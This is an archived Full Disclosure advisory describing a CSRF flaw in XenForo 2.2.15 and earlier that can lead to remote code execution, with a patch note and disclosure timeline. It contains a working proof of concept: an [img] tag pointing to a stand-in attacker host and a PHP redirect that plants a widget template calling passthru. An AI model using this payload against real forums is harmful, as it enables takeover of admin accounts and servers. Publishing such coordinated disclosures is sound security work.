lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAJeQoQdiNSqh_ROuSgYbGi1KHME0z6AQR=PmMMGY8GLZoGb__Q@mail.gmail.com> Date: Tue, 16 Jul 2024 15:58:13 +0200 From: Egidio Romano <n0b0d13s@...il.com> To: fulldisclosure@...lists.org Subject: [FD] [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability ------------------------------------------------------------------------------- XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability ------------------------------------------------------------------------------- [-] Software Link: https://xenforo.com [-] Affected Versions: Version 2.2.15 and prior versions. [-] Vulnerability Description: The XF\Admin\Controller\Widget::actionSave() method, defined into the /src/XF/Admin/Controller/Widget.php script, does not check whether the current HTTP request is a POST or a GET before saving a widget. XenForo does perform anti-CSRF checks for POST requests only, as such this method can be abused in a Cross-Site Request Forgery (CSRF) attack to create/modify arbitrary XenForo widgets via GET requests, and this can also be exploited in tandem with KIS-2024-06 to perform CSRF-based Remote Code Execution (RCE) attacks. Furthermore, XenForo implements a BB code system, as such this vulnerability could also be exploited through "Stored CSRF" attacks by abusing the [img] BB code tag, creating a thread or a private message (to be sent to the victim user) like the following: [img]https://attacker.website/exploit.php[/img] Where the exploit.php script hosted on the attacker-controlled website could be something like this: <?php $url = "https://victim.website/xenforo/"; header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}"); ?> Successful exploitation of this vulnerability requires a victim user with permissions to administer styles or widgets to be currently logged into the Admin Control Panel. [-] Solution: Update to a fixed version or apply the vendor patches. [-] Disclosure Timeline: [22/02/2024] - Vulnerability details sent to SSD Secure Disclosure [05/06/2024] - Vendor released patches and fixed versions [14/06/2024] - CVE identifier requested [16/06/2024] - CVE identifier assigned [16/07/2024] - Coordinated public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-38457 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://xenforo.com/community/threads/222133 https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/ [-] Original Advisory: http://karmainsecurity.com/KIS-2024-05 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists